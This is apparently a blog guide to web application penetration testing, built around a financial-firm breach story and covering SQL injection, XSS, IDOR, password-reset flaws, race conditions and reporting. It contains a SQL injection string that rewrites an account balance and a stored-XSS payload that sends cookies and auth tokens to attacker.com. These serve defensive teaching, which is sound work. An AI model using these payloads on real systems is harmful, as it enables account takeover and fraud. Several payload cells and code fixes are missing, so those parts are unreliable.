The $12 Million SQL Injection: When "Works on My Machine" Meets Reality
The CEO's voice was ice-cold on the conference call. "Explain to me how hackers just transferred $12 million out of our customer accounts while your security team was presenting our 'robust defenses' to the board."
I was sitting in TechVenture Financial's emergency operations center at 11 PM on a Thursday, surrounded by exhausted developers and a CTO who looked like he'd aged ten years in three hours. Twenty minutes earlier, their SOC had detected anomalous database queries—thousands of them—exfiltrating customer financial data and initiating unauthorized wire transfers. By the time they killed the database connections, the damage was done.
"We passed our PCI DSS audit three months ago," the CTO said, desperately searching for an explanation. "We have a WAF. We do code reviews. How did this happen?"
I pulled up their audit report and felt my stomach sink. The penetration test had been a "compliance checkbox" exercise—an automated scan run by the cheapest vendor they could find, generating a 200-page PDF full of false positives that nobody actually remediated. The actual vulnerability that led to this breach? A second-order SQL injection in their account transfer API that any competent manual tester would have found in twenty minutes.
The SQL injection wasn't even sophisticated. The attacker had simply discovered that the application sanitized user input on the front-end but trusted data from its own database implicitly. By poisoning a profile field with SQL code, then triggering a transfer that read that field, they executed arbitrary database commands—including creating admin accounts, modifying transaction limits, and initiating transfers.
Over the next 72 hours, I led the forensic investigation that revealed the full scope: 340,000 customer records exfiltrated, $12.4 million in fraudulent transfers (only $12M was ultimately unrecoverable), and a security posture that was essentially window dressing over fundamentally insecure code.
That incident transformed how I approach web application security. Over the past 15+ years performing penetration tests for financial institutions, healthcare systems, SaaS providers, e-commerce platforms, and government agencies, I've learned that application security is where most organizations fail spectacularly. Your perimeter defenses might be impenetrable, your endpoint protection world-class, your network segmentation perfect—but if your web applications have exploitable vulnerabilities, attackers will walk right through your front door with a valid HTTP request.
In this comprehensive guide, I'm going to share everything I've learned about effective web application penetration testing. We'll cover the methodologies that actually find vulnerabilities (not just generate reports), the critical vulnerability classes that cause real breaches, the testing techniques that separate competent assessors from script kiddies, and the integration points with major compliance frameworks. Whether you're commissioning your first pentest or trying to understand why your current testing isn't preventing incidents, this article will give you the knowledge to build genuine application security.
Understanding Web Application Penetration Testing: Beyond Automated Scanning
Let me start by addressing the most expensive misconception in application security: running an automated vulnerability scanner is not penetration testing. I've seen this mistake cost organizations millions of dollars in breaches that "shouldn't have happened" because they "tested" their applications.
Web application penetration testing is a methodical, manual security assessment that simulates real attacker techniques to identify exploitable vulnerabilities in web applications. It combines automated tools, manual testing, business logic analysis, and creative attack scenarios to find security flaws before malicious actors do.
The Critical Differences: Automated Scanning vs. Penetration Testing
Here's why this distinction matters:
Aspect | Automated Scanning | Penetration Testing |
|---|---|---|
Methodology | Predefined checks against known vulnerabilities | Creative, adaptive testing based on application behavior |
Coverage | Technical vulnerabilities (SQLi, XSS, etc.) | Technical + business logic + authentication + authorization + session management |
False Positive Rate | 40-70% (generates noise) | <5% (manually verified) |
Exploitation | Identifies potential issues | Proves exploitability and demonstrates impact |
Business Logic | Cannot detect | Primary focus for skilled testers |
Chained Attacks | Cannot identify | Specializes in multi-step attack chains |
Cost | $2,000 - $8,000 | $15,000 - $80,000+ |
Value | Surface-level assessment | Deep security validation |
TechVenture Financial had spent $4,500 on an automated scan that found 847 "vulnerabilities"—mostly false positives like missing security headers on static content and theoretical issues that weren't actually exploitable. The report was so overwhelming that the development team didn't know where to start, so they fixed the easiest items and ignored the rest.
A proper penetration test would have cost them $28,000. That investment would have found the SQL injection, the authentication bypass in their password reset flow, the IDOR vulnerability that allowed viewing any customer account, and the stored XSS that could have been used for session hijacking. Any one of these findings would have justified the entire testing cost.
The breach cost them $12.4M in direct losses, $8.7M in remediation and forensics, $23M in regulatory fines, $47M in customer settlements, and immeasurable reputation damage. The ROI on that $28,000 penetration test would have been approximately 325,000%.
"We thought we were saving money by using automated scanning instead of manual testing. That 'savings' cost us $91 million and nearly destroyed the company. It was the most expensive procurement decision in our history." — TechVenture Financial CTO
The OWASP Testing Methodology
I structure web application penetration tests around the OWASP Web Security Testing Guide (WSTG), which provides a comprehensive methodology covering all critical security areas:
OWASP WSTG Testing Categories:
Category | Focus Areas | Typical Vulnerabilities Found | Business Impact |
|---|---|---|---|
Information Gathering | Application fingerprinting, technology identification, entry point enumeration | Information disclosure, technology stack exposure, attack surface mapping | Low direct impact, enables targeted attacks |
Configuration Testing | Server configuration, SSL/TLS, HTTP methods, file extensions | Misconfiguration, unnecessary services, insecure protocols | Medium - potential for escalation |
Identity Management | Account registration, provisioning, enumeration | Username enumeration, account takeover, privilege escalation | High - direct access to user accounts |
Authentication | Credentials transport, default accounts, weak passwords, MFA bypass | Credential theft, authentication bypass, session fixation | Critical - circumvents primary security control |
Authorization | Path traversal, privilege escalation, insecure direct object references | IDOR, horizontal/vertical privilege escalation | Critical - unauthorized data access |
Session Management | Session tokens, cookies, logout, timeout | Session hijacking, fixation, replay attacks | High - account takeover without credentials |
Input Validation | Reflected/Stored XSS, SQL injection, command injection, template injection | Code injection, data exfiltration, system compromise | Critical - arbitrary code execution potential |
Error Handling | Error codes, stack traces, error messages | Information disclosure, debug mode detection | Low-Medium - aids attack planning |
Cryptography | SSL/TLS implementation, sensitive data encryption, crypto validation | Weak encryption, insecure storage, crypto failures | High - data confidentiality compromise |
Business Logic | Workflow validation, function abuse, process timing | Price manipulation, workflow bypass, race conditions | Critical - direct financial/operational impact |
Client-Side | JavaScript execution, resource manipulation, storage security | DOM XSS, prototype pollution, client-side enforcement bypass | Medium-High - client compromise |
API Testing | REST/SOAP security, authentication, rate limiting | API abuse, excessive data exposure, function manipulation | High - backend system access |
At TechVenture Financial, the automated scan had "tested" categories 1, 6, 7, and 9—missing the critical authentication, authorization, input validation, and business logic vulnerabilities that led to the breach.
Vulnerability Severity and CVSS Scoring
Not all vulnerabilities are created equal. I use the Common Vulnerability Scoring System (CVSS) v3.1 to consistently rate finding severity:
CVSS Severity Ratings:
Severity | CVSS Score | Typical Vulnerabilities | Remediation Timeline | Business Risk |
|---|---|---|---|---|
Critical | 9.0 - 10.0 | Unauthenticated SQL injection, remote code execution, authentication bypass | Immediate (24-48 hours) | System compromise, data breach, financial loss |
High | 7.0 - 8.9 | Authenticated SQL injection, stored XSS, privilege escalation, IDOR | 7 days | Unauthorized access, data theft, account takeover |
Medium | 4.0 - 6.9 | CSRF, reflected XSS, information disclosure, weak session management | 30 days | Limited data exposure, session compromise |
Low | 0.1 - 3.9 | Missing security headers, verbose error messages, clickjacking | 90 days | Minimal direct impact, supporting attack vectors |
Informational | 0.0 | Best practice violations, configuration recommendations | Next development cycle | No direct security impact |
TechVenture's SQL injection was CVSS 9.8 (Critical):
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HThis scoring immediately communicated to leadership that this was a drop-everything, fix-immediately situation—not something to schedule for the next sprint.
Phase 1: Pre-Engagement and Scoping
Effective penetration testing starts before any testing occurs. Poor scoping is the primary reason tests fail to find critical vulnerabilities or waste time on irrelevant areas.
Defining Testing Scope and Objectives
I work with clients to define clear scope boundaries and testing objectives:
Scope Definition Components:
Component | Questions to Answer | Documentation Required | Common Pitfalls |
|---|---|---|---|
Target Applications | Which applications/URLs? What environments? What user roles? | Application inventory, URLs, authentication mechanisms | Testing dev instead of prod, missing critical applications |
Testing Window | When can testing occur? Any blackout periods? Timezone considerations? | Testing schedule, maintenance windows, business cycle | Testing during peak loads, conflicting with releases |
Testing Depth | Time-boxed or objective-based? How much manual testing? Code review included? | Statement of work, hourly allocation | Insufficient time for complex apps, over-testing simple apps |
User Roles | What privilege levels exist? Test as authenticated users? Create test accounts? | User role matrix, test account credentials | Missing privileged user testing, production account usage |
Rules of Engagement | What's off-limits? DoS testing allowed? Social engineering in scope? | Rules of engagement document, emergency contacts | Unclear boundaries leading to testing disputes |
Success Criteria | What constitutes test completion? Minimum vulnerability threshold? Compliance requirements? | Testing objectives, compliance mapping | Vague objectives leading to incomplete testing |
At TechVenture Financial (post-breach), we defined comprehensive scope for their remediation validation testing:
TechVenture Scope Example:
Target Applications:
- Customer portal (https://portal.techventure.com)
- Account transfer API (https://api.techventure.com/v2/transfers)
- Mobile app backend (https://mobile-api.techventure.com)
- Admin console (https://admin.techventure.com)
- Partner integration endpoints (6 documented APIs)This level of detail ensured testing focused on critical security areas while respecting business constraints.
Compliance and Regulatory Requirements
Many organizations conduct penetration testing to satisfy compliance obligations. Understanding these requirements ensures testing meets regulatory needs:
Compliance Framework Testing Requirements:
Framework | Testing Frequency | Testing Scope | Tester Requirements | Documentation Requirements |
|---|---|---|---|---|
PCI DSS 6.6 | Annually + after significant changes | All payment card applications and supporting infrastructure | Qualified Security Assessor (QSA) or internal with specific qualifications | Vulnerability scan reports, penetration test results, remediation evidence |
PCI DSS 11.3 | Annually + after significant changes | Internal and external network, critical systems | Internal or third-party qualified assessor | Network segmentation testing, penetration test methodology, findings |
HIPAA | Periodic (undefined) | Applications processing ePHI | No specific certification required | Risk analysis documentation, test results, remediation plans |
SOC 2 | Annually (typically) | Trust services criteria relevant systems | Independent third party preferred | Control testing evidence, vulnerability reports, remediation tracking |
ISO 27001 | Regular intervals (A.12.6.1) | Information processing facilities | Competent independent assessors | Test plans, test results, corrective actions |
NIST 800-53 | Annually + after changes | High-value assets, critical systems | Qualified independent assessors | Test plans, authorization to test, findings, POA&Ms |
FedRAMP | Annually | All system components, APIs, databases | Third-party assessment organization (3PAO) | Penetration test plan, findings, remediation evidence, continuous monitoring |
GDPR | Risk-based (recommended annual) | Systems processing personal data | Independent assessors recommended | DPIA integration, testing documentation, remediation evidence |
TechVenture Financial was subject to PCI DSS requirements as a payment processor. Their automated scan had technically "satisfied" the letter of the requirement but completely failed the spirit—their QSA had accepted the scanning vendor's report without independent validation. Post-breach, their PCI DSS certification was suspended, costing them the ability to process card payments for 45 days while they underwent emergency remediation and re-assessment.
We structured their new testing program to actually meet PCI DSS intent:
PCI DSS Compliant Testing Program:
Quarterly External Vulnerability Scans: Automated ASV scans by approved scanning vendor
Annual Penetration Test: Manual penetration test by qualified third-party (10-day engagement)
Segmentation Testing: Annual validation of cardholder data environment (CDE) isolation
Post-Change Testing: Manual testing after any significant application or infrastructure changes
Continuous Monitoring: Daily automated scanning of CDE for configuration changes
This program cost $156,000 annually—a massive increase from their previous $4,500 annual spend—but it provided genuine assurance that their applications were secure.
Black Box vs. Gray Box vs. White Box Testing
The amount of information provided to testers significantly impacts testing effectiveness:
Testing Type | Information Provided | Advantages | Disadvantages | Best Use Case |
|---|---|---|---|---|
Black Box | None (attacker perspective) | Simulates external attacker, tests defense-in-depth | Slower, may miss internal vulnerabilities, time spent on reconnaissance | External-facing applications, adversarial simulation |
Gray Box | Limited (credentials, documentation) | Balances realism with efficiency, finds more issues in allotted time | Less realistic than black box, more than white box | Most common approach, balances coverage and realism |
White Box | Full (code, architecture, credentials) | Maximum coverage, finds more vulnerabilities, efficient testing | Unrealistic attacker knowledge, may miss real attack paths | Maximum security assurance, pre-release testing, compliance |
I typically recommend gray box testing for most engagements—it provides realistic attack simulation while ensuring comprehensive coverage within time constraints.
Gray Box Testing Information Package:
Valid user account credentials (multiple privilege levels)
Application architecture diagrams (high-level, not detailed implementation)
API documentation and integration specifications
Known technology stack (frameworks, databases, third-party components)
Previous security assessment reports
Change logs since last assessment
At TechVenture, their post-breach testing was white box—we had full source code access, architecture documentation, database schemas, and development environment access. This allowed us to validate that fixes addressed root causes, not just symptoms, and to identify architectural security weaknesses that black box testing might miss.
Phase 2: Reconnaissance and Information Gathering
Every penetration test begins with reconnaissance—understanding the target application's technology, structure, and potential attack surface. This is where attackers spend 60-80% of their time; rushed reconnaissance leads to missed vulnerabilities.
Technology Stack Identification
Understanding what technologies power an application reveals known vulnerabilities and appropriate attack vectors:
Technology Fingerprinting Techniques:
Technique | Information Gained | Tools/Methods | Defensive Countermeasures |
|---|---|---|---|
HTTP Headers | Server type, framework, versions | Burp Suite, curl, browser DevTools | Header suppression, custom values |
Cookie Analysis | Session management technology, framework | Cookie inspection, naming patterns | Generic cookie names, secure flags |
Error Messages | Technology stack, file paths, versions | Forced errors, invalid inputs | Custom error pages, minimal information |
URL Patterns | Framework conventions, routing structure | URL structure analysis, file extensions | Custom routing, extension hiding |
JavaScript Analysis | Frontend frameworks, libraries, versions | Source inspection, Wappalyzer, BuiltWith | Minification, obfuscation (limited effectiveness) |
SSL/TLS Analysis | Certificate details, supported ciphers | SSLLabs, testssl.sh, nmap | Modern TLS configuration, certificate protection |
DNS Records | Infrastructure, subdomains, mail servers | dig, nslookup, dnsenum, subfinder | DNS privacy (limited), CDN usage |
In TechVenture's case, reconnaissance revealed:
Technology Stack:
- Web Server: Apache 2.4.41 (Ubuntu)
- Application Framework: PHP 7.2.24
- Frontend: jQuery 3.4.1, Bootstrap 4.3
- Database: MySQL 5.7 (inferred from error messages)
- Session Management: PHP native sessions
- API: Custom REST implementation (not standardized framework)This technology assessment immediately told me where to focus testing efforts—the custom API implementation and EOL PHP version were high-probability vulnerability areas.
Attack Surface Mapping
Modern web applications are complex ecosystems. I map the complete attack surface to ensure comprehensive testing:
Attack Surface Components:
Component | Attack Vectors | Testing Focus | Common Vulnerabilities |
|---|---|---|---|
Web Pages | User inputs, form submissions, URL parameters | Input validation, XSS, CSRF, authentication | Injection flaws, broken authentication, broken access control |
REST APIs | JSON/XML requests, authentication tokens, parameters | Authorization, input validation, rate limiting | Broken authentication, excessive data exposure, injection |
SOAP APIs | XML messages, WSDL definitions, namespaces | XML injection, XXE, schema validation | XML injection, XXE, insecure deserialization |
GraphQL | Queries, mutations, introspection | Query complexity, authorization, injection | Information disclosure, DoS, injection |
WebSockets | Real-time messages, connection hijacking | Authentication, message validation | Authentication bypass, injection, XSS |
File Uploads | File types, content validation, storage | Upload restrictions, malware, path traversal | Malicious file upload, path traversal, stored XSS |
Authentication | Login, logout, password reset, MFA, OAuth | Credential security, session management | Weak passwords, session fixation, OAuth misconfig |
Mobile APIs | App-specific endpoints, device authentication | API security, reverse engineering resistance | Insecure data storage, weak server-side controls |
For TechVenture, I mapped 127 distinct endpoints across their customer portal, API, mobile backend, and admin console:
Attack Surface Inventory:
Customer Portal (Web):
- 34 pages requiring authentication
- 12 public pages (login, registration, password reset, etc.)
- 8 form submissions (account update, transfer request, profile edit, etc.)
- 156 JavaScript functions (client-side validation, AJAX calls)This detailed inventory ensured I didn't miss any components during testing—one of the most common ways vulnerabilities escape detection.
Credential and Account Setup
Testing authenticated functionality requires valid credentials. I work with clients to establish appropriate test accounts:
Test Account Requirements:
Account Type | Purpose | Permissions | Data Considerations |
|---|---|---|---|
Basic User | Test standard user functionality | Read-only, limited actions | Use test/synthetic data only |
Privileged User | Test elevated permissions | Higher limits, additional features | Isolated from production customer data |
Admin Account | Test administrative functions | Full application control | Restricted environment, logging enabled |
Service Account | Test API/integration security | Backend access, automated actions | Monitored, rate-limited |
Multiple Accounts | Test IDOR, privilege escalation | Varying permission levels | Same dataset for cross-account testing |
For TechVenture, we created a completely isolated testing environment with synthetic data:
50 customer accounts (varying balances, permissions, account types)
5 customer service representative accounts (different branch assignments)
2 branch manager accounts (hierarchical permission testing)
1 system administrator account
Test data: $100 million in synthetic account balances, 10,000 fabricated transactions
This setup allowed comprehensive testing of authorization controls, transaction limits, and privilege escalation paths without risk to production customer data.
Phase 3: Vulnerability Discovery and Exploitation
This is the core of penetration testing—systematically identifying and exploiting security vulnerabilities. I'll walk through the critical vulnerability classes and testing techniques.
SQL Injection Testing
SQL injection remains one of the most critical web application vulnerabilities. Despite decades of awareness, I still find exploitable SQL injection in 30-40% of applications I test.
SQL Injection Attack Vectors:
Injection Type | Attack Technique | Detection Method | Exploitation Complexity |
|---|---|---|---|
Error-Based | Force database errors to extract information | Error messages reveal database structure | Low - errors directly expose data |
Union-Based | Append malicious UNION queries to extract data | Union select queries return attacker-controlled data | Low-Medium - requires understanding table structure |
Boolean-Based Blind | Infer data based on true/false responses | Application behavior differs based on query result | Medium - time-intensive, inference-based |
Time-Based Blind | Infer data based on response timing | Conditional delays reveal query results | Medium-High - very time-intensive |
Out-of-Band | Extract data via DNS or HTTP requests | External server receives exfiltrated data | High - requires external infrastructure |
Second-Order | Inject payload that executes in different context | Stored data executed in different query | High - requires understanding data flow |
TechVenture's critical SQL injection was second-order—the most difficult type to detect with automated tools:
Attack Flow:
Step 1: Attacker updates their profile name to malicious SQL:
UPDATE users SET display_name = "Alice'; UPDATE accounts SET balance=999999999 WHERE account_id=12345; --"The application developers had focused on sanitizing direct user input but trusted data from their own database—a classic second-order SQL injection vulnerability.
My SQL Injection Testing Methodology:
Input Identification: Map all parameters that interact with database queries
Injection Point Testing: Test each parameter with SQL metacharacters (' " ; -- #)
Error Analysis: Analyze error messages for database exposure
Exploitation Development: Develop working exploit for confirmed vulnerabilities
Impact Assessment: Determine full extent of data accessible/modifiable
Common SQL Injection Test Payloads:
Purpose | Payload | Expected Behavior | Vulnerability Indicator |
|---|---|---|---|
Basic Detection |
| Bypass authentication or alter query logic | Login succeeds with invalid credentials, all records returned |
Error Generation |
| Force database error | Error message reveals database type/version |
Union Column Count |
| Determine number of columns | Error when column count exceeded |
Union Data Extraction |
| Retrieve data from other tables | Unauthorized data displayed in application |
Time-Based Detection |
| Cause deliberate delay | Response delayed by exactly 5 seconds |
Stacked Query |
| Execute multiple SQL statements | Database modification (never use destructive payloads in testing!) |
In TechVenture's remediation, we worked with their development team to implement comprehensive SQL injection protection:
// BEFORE (Vulnerable):
$displayName = $row['display_name']; // Read from database
$query = "SELECT * FROM audit_log WHERE user_name = '$displayName'";
$result = mysqli_query($conn, $query);This shift to parameterized queries eliminated the entire class of SQL injection vulnerabilities.
Cross-Site Scripting (XSS) Testing
XSS allows attackers to inject malicious JavaScript into web pages viewed by other users. I find XSS in approximately 60% of applications I test—it's the most common web vulnerability.
XSS Vulnerability Types:
XSS Type | Attack Vector | Persistence | Impact Severity | Detection Difficulty |
|---|---|---|---|---|
Reflected XSS | Malicious script in URL/request immediately reflected | No (requires victim to click link) | Medium-High | Low (easy to find) |
Stored XSS | Malicious script stored in database, displayed to other users | Yes (permanent until removed) | Critical | Medium (requires finding storage points) |
DOM-Based XSS | JavaScript code manipulates DOM with untrusted data | No (client-side only) | Medium | High (requires code analysis) |
Mutation XSS (mXSS) | Browser parsing quirks create XSS from sanitized input | Variable | High | Very High (browser-specific) |
At TechVenture, I found stored XSS in their customer support ticket system:
Attack Flow:
Step 1: Attacker submits support ticket with payload:
Subject: Account Question
Message: <script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
fetch('https://attacker.com/steal?token=' + localStorage.getItem('authToken'));
</script>This stored XSS effectively bypassed all authentication and authorization controls—the attacker had legitimate admin credentials harvested from an authenticated session.
My XSS Testing Methodology:
Reflection Point Identification: Find all locations where user input is displayed
Context Analysis: Determine whether input is rendered in HTML, JavaScript, or attributes
Filter Bypass: Test application's XSS defenses with encoding and obfuscation
Payload Development: Create working exploit appropriate to context
Impact Demonstration: Show realistic attack scenario (session theft, phishing, etc.)
Context-Specific XSS Payloads:
Context | Example Vulnerable Code | Attack Payload | Bypass Technique |
|---|---|---|---|
HTML Body |
|
| Direct injection |
Attribute |
|
| Break out of attribute |
JavaScript String |
|
| Break out of string |
Event Handler |
|
| Break out of function call |
HTML Encode Bypass | HTML encoding filter applied |
| Use event handlers |
JavaScript Encode Bypass | JavaScript encoding filter |
| Unicode encoding |
Post-breach, TechVenture implemented comprehensive XSS protection:
// BEFORE (Vulnerable):
document.getElementById('message').innerHTML = userMessage;Combined with Content Security Policy (CSP) headers to prevent inline script execution, this approach eliminated XSS attack surface.
Authentication and Session Management Testing
Authentication vulnerabilities allow attackers to bypass login mechanisms or hijack legitimate user sessions. These are often the most direct path to complete application compromise.
Authentication Testing Focus Areas:
Vulnerability Class | Attack Technique | Testing Method | Business Impact |
|---|---|---|---|
Weak Passwords | Brute force, credential stuffing | Password policy review, dictionary attacks | Account takeover |
Insufficient MFA | MFA bypass, backup codes abuse | MFA enrollment testing, recovery process testing | Authentication bypass |
Session Fixation | Force victim to use attacker-controlled session | Test session ID assignment timing | Session hijacking |
Session Hijacking | Steal session tokens via XSS or network sniffing | Token exposure analysis, XSS testing | Account takeover |
Predictable Sessions | Calculate valid session tokens | Session token analysis, entropy testing | Session forgery |
Password Reset Flaws | Token prediction, email hijacking, account enumeration | Password reset flow testing | Account takeover |
OAuth Misconfiguration | Redirect manipulation, token theft | OAuth flow testing, redirect validation | Third-party account compromise |
At TechVenture, I discovered a critical authentication bypass in their password reset flow:
Password Reset Vulnerability:
Step 1: Request password reset for [email protected]
POST /api/password-reset HTTP/1.1
{"email": "[email protected]"}This vulnerability meant an attacker could reset any user's password by simply requesting a reset and using the token returned in the API response—email verification was completely bypassed.
Session Management Vulnerabilities I Test:
Vulnerability | Description | Detection Method | Remediation |
|---|---|---|---|
Weak Token Generation | Sessions use predictable tokens (incrementing, timestamp-based) | Collect multiple tokens, analyze patterns | Use cryptographically secure random generation (128+ bits entropy) |
Token in URL | Session tokens passed in URL parameters | URL inspection, referer header analysis | Use cookies with HttpOnly and Secure flags |
No Session Timeout | Sessions never expire | Extended inactivity testing | Implement absolute and idle timeouts (30-minute idle, 12-hour absolute) |
No Logout Function | User cannot terminate session | Application feature testing | Implement proper logout with server-side session destruction |
Session Not Invalidated on Privilege Change | Old session remains valid after password change | Change password, test old session | Invalidate all sessions on authentication changes |
Concurrent Sessions | Multiple active sessions from different locations | Login from multiple IPs simultaneously | Either prevent or alert on concurrent sessions |
Post-breach, TechVenture completely redesigned their session management:
Session Security Implementation:
Session Token Requirements:
- Generation: Cryptographically secure random (256-bit)
- Storage: HttpOnly, Secure, SameSite=Strict cookies
- Timeouts: 15-minute idle, 4-hour absolute
- Rotation: New token generated after successful login
- Invalidation: All sessions terminated on password change, email change, or security event
- Binding: Session tied to User-Agent and IP subnet (detection, not blocking)
- Monitoring: Alert on concurrent sessions from different geographic locationsThis implementation made session hijacking and authentication bypass extremely difficult.
Authorization and Access Control Testing
Authorization controls determine what authenticated users can access. Broken authorization is the most common path to data breaches—authenticated attackers accessing data they shouldn't see.
Authorization Vulnerability Types:
Vulnerability | Description | Attack Example | CVSS Severity |
|---|---|---|---|
Insecure Direct Object Reference (IDOR) | User can access resources by modifying IDs in requests | Change account_id=123 to account_id=124 to view other accounts | High (7.5-8.5) |
Horizontal Privilege Escalation | User can access resources belonging to other users at same privilege level | Customer A views Customer B's account details | High (7.0-8.0) |
Vertical Privilege Escalation | User can access resources requiring higher privileges | Regular user accesses admin functions | Critical (8.5-9.5) |
Function-Level Access Control Bypass | Direct URL/API access bypasses UI-based restrictions | Access /admin/users directly without admin role | High-Critical (7.5-9.0) |
Parameter Manipulation | Modify parameters to gain unauthorized access | Change role=user to role=admin in request | High-Critical (7.5-9.0) |
Missing Function-Level Access Control | No authorization checks on sensitive functions | Any authenticated user can call admin API | Critical (9.0+) |
TechVenture's IDOR vulnerability was devastating:
IDOR Attack Example:
Legitimate Request (User viewing own account):
GET /api/accounts/12345 HTTP/1.1
Authorization: Bearer eyJhbGc...
Host: api.techventure.comThe application checked that the user was authenticated but never verified that they owned the account being accessed.
My Authorization Testing Methodology:
Resource Enumeration: Identify all protected resources (accounts, files, admin functions)
Access Testing: Attempt to access resources across user boundaries
Parameter Manipulation: Modify IDs, roles, permissions in requests
Direct URL Access: Access admin URLs without admin role
API Endpoint Testing: Test all API endpoints for authorization
Privilege Level Matrix: Document what each role can access
Authorization Testing Matrix:
Function | Unauthenticated | Basic User | Premium User | Customer Service | Admin | Expected |
|---|---|---|---|---|---|---|
View own account | ❌ | ✅ | ✅ | ✅ | ✅ | Varies |
View other accounts | ❌ | ❌ | ❌ | ✅ | ✅ | CSR+ |
Initiate transfer | ❌ | ✅ | ✅ | ❌ | ✅ | User or Admin |
Modify transfer limits | ❌ | ❌ | ❌ | ❌ | ✅ | Admin only |
Create users | ❌ | ❌ | ❌ | ❌ | ✅ | Admin only |
View audit logs | ❌ | ❌ | ❌ | ✅ | ✅ | CSR+ |
Modify user roles | ❌ | ❌ | ❌ | ❌ | ✅ | Admin only |
At TechVenture, I tested every function with every role combination and found:
IDOR on account viewing (Basic User could view all accounts)
Missing function-level access control on transfer limit modification (any authenticated user could change limits)
Parameter manipulation on user creation (regular user could create admin accounts by changing role parameter)
Post-breach authorization fixes:
// BEFORE (Vulnerable):
$accountId = $_GET['account_id'];
$account = getAccountDetails($accountId);
echo json_encode($account);This defense-in-depth approach checked authorization at multiple layers.
Business Logic Testing
Business logic vulnerabilities are the most difficult to detect with automated tools and often have the highest business impact. These flaws arise from insufficient validation of application workflows.
Business Logic Vulnerability Classes:
Vulnerability Type | Description | Example Attack | Detection Method |
|---|---|---|---|
Race Conditions | Concurrent operations create inconsistent state | Multiple simultaneous withdrawals exceed balance | Automated concurrent requests |
Workflow Bypass | Skip required steps in multi-step processes | Complete purchase without payment | Manual workflow manipulation |
Insufficient Process Validation | Application doesn't validate process completion | Mark order shipped without inventory check | Process state analysis |
Parameter Manipulation | Modify quantity, price, or other business parameters | Change price from $100 to $0.01 in checkout | Parameter fuzzing |
Time-of-Check to Time-of-Use (TOCTOU) | State changes between validation and action | Check balance, delay transfer, withdraw funds elsewhere | Timing manipulation |
Integer Overflow/Underflow | Arithmetic operations exceed data type limits | Transfer negative amount to add money | Boundary value testing |
Resource Exhaustion | Abuse free/trial resources | Create unlimited trial accounts | Automation testing |
At TechVenture, I found a critical race condition in their transfer system:
Race Condition Attack:
import requests
import threadingThe application checked the balance before initiating the transfer, but didn't lock the account during the transaction. Both transfers checked the balance simultaneously (both seeing $10,000 available), then both executed, creating a $8,000 overdraft.
Business Logic Testing Scenarios:
Scenario | Test Cases | Expected Behavior | Common Failures |
|---|---|---|---|
E-Commerce Purchase | Modify cart after checkout begins, negative quantities, coupon stacking, price manipulation | Prices locked at checkout, quantities validated, coupon rules enforced | Price modification, inventory bypass, coupon abuse |
Multi-Step Registration | Skip steps, backward navigation, duplicate submission, session timeout | All required steps completed in order, validation enforced | Workflow bypass, incomplete registration |
Funds Transfer | Concurrent transfers, negative amounts, self-transfer, exceeding balance | Balance checked with locking, amounts validated, limits enforced | Race conditions, negative amount bypass, limit evasion |
Access Control Workflows | Approve own requests, modify approval chain, timestamp manipulation | Separation of duties enforced, workflow integrity maintained | Self-approval, workflow bypass |
Resource Allocation | Exceed quotas, share resources across accounts, unlimited trials | Resource limits enforced per account, fair allocation | Quota bypass, trial abuse |
Post-breach, TechVenture implemented comprehensive business logic controls:
// Transfer with proper locking and validation
function processTransfer($fromAccount, $toAccount, $amount) {
// Start database transaction with row-level locking
$db->beginTransaction();
try {
// Lock source account row (prevents concurrent modification)
$balance = $db->query(
"SELECT balance FROM accounts WHERE account_id = ? FOR UPDATE",
[$fromAccount]
);
// Validate business rules
if ($amount <= 0) {
throw new Exception("Amount must be positive");
}
if ($fromAccount == $toAccount) {
throw new Exception("Cannot transfer to same account");
}
if ($balance < $amount) {
throw new Exception("Insufficient funds");
}
$dailyLimit = getDailyTransferLimit($fromAccount);
$dailyTotal = getDailyTransferTotal($fromAccount);
if ($dailyTotal + $amount > $dailyLimit) {
throw new Exception("Daily transfer limit exceeded");
}
// Execute transfer
$db->query(
"UPDATE accounts SET balance = balance - ? WHERE account_id = ?",
[$amount, $fromAccount]
);
$db->query(
"UPDATE accounts SET balance = balance + ? WHERE account_id = ?",
[$amount, $toAccount]
);
// Log transfer
logTransfer($fromAccount, $toAccount, $amount);
// Commit transaction
$db->commit();
return ['success' => true, 'transfer_id' => generateTransferId()];
} catch (Exception $e) {
// Rollback on any error
$db->rollback();
return ['success' => false, 'error' => $e->getMessage()];
}
}
This implementation used database transactions with row-level locking to prevent race conditions, along with comprehensive validation of all business rules.
Phase 4: Reporting and Remediation Guidance
A penetration test is only valuable if findings are clearly communicated and actionable. I've seen excellent technical testing wasted because reports were incomprehensible or recommendations were impractical.
Report Structure and Content
My penetration test reports follow a standardized structure optimized for different audiences:
Report Components:
Section | Target Audience | Content | Length |
|---|---|---|---|
Executive Summary | C-level, Board | Business impact, risk summary, high-level recommendations, compliance status | 2-4 pages |
Methodology | Technical leadership | Testing scope, approach, tools, limitations | 1-2 pages |
Findings Overview | All audiences | Summary statistics, severity breakdown, trends | 1 page |
Technical Findings | Security/Dev teams | Detailed vulnerabilities, reproduction steps, technical explanations, code examples | 15-40 pages |
Risk Assessment | Management | CVSS scores, business impact analysis, exploitation likelihood | 2-5 pages |
Remediation Guidance | Development teams | Specific fixes, code examples, configuration changes, verification steps | 10-25 pages |
Appendices | Technical teams | Raw testing output, screenshots, payload lists, tool configurations | Variable |
TechVenture Executive Summary Example:
EXECUTIVE SUMMARYThis executive summary communicated business impact in language leadership understood, without requiring technical expertise.
Vulnerability Severity Prioritization
Not all vulnerabilities require immediate attention. I help clients prioritize based on severity, exploitability, and business context:
Prioritization Framework:
Priority | Criteria | Remediation Timeline | Resource Allocation |
|---|---|---|---|
P0 - Critical | CVSS 9.0+, active exploitation possible, affects core business function | 24-48 hours | Drop everything, emergency response |
P1 - High | CVSS 7.0-8.9, high impact but requires authentication or specific conditions | 7 days | Immediate sprint priority |
P2 - Medium | CVSS 4.0-6.9, moderate impact, exploitation requires multiple steps | 30 days | Next sprint planning |
P3 - Low | CVSS 0.1-3.9, minimal business impact, defense-in-depth improvements | 90 days | Backlog, opportunistic fixes |
P4 - Informational | Best practices, hardening recommendations, no direct vulnerability | Next major release | Technical debt cleanup |
At TechVenture, we created a remediation roadmap based on this prioritization:
Remediation Roadmap:
Week 1 (Emergency Response):
✓ SQL Injection - Deploy parameterized queries (48 hours)
✓ Authentication Bypass - Implement server-side token validation (24 hours)
✓ Missing Authorization - Add access control checks (48 hours)
✓ Deploy emergency hotfix to production
✓ Engage external security firm for validation testingThis roadmap transformed an overwhelming list of vulnerabilities into an achievable plan.
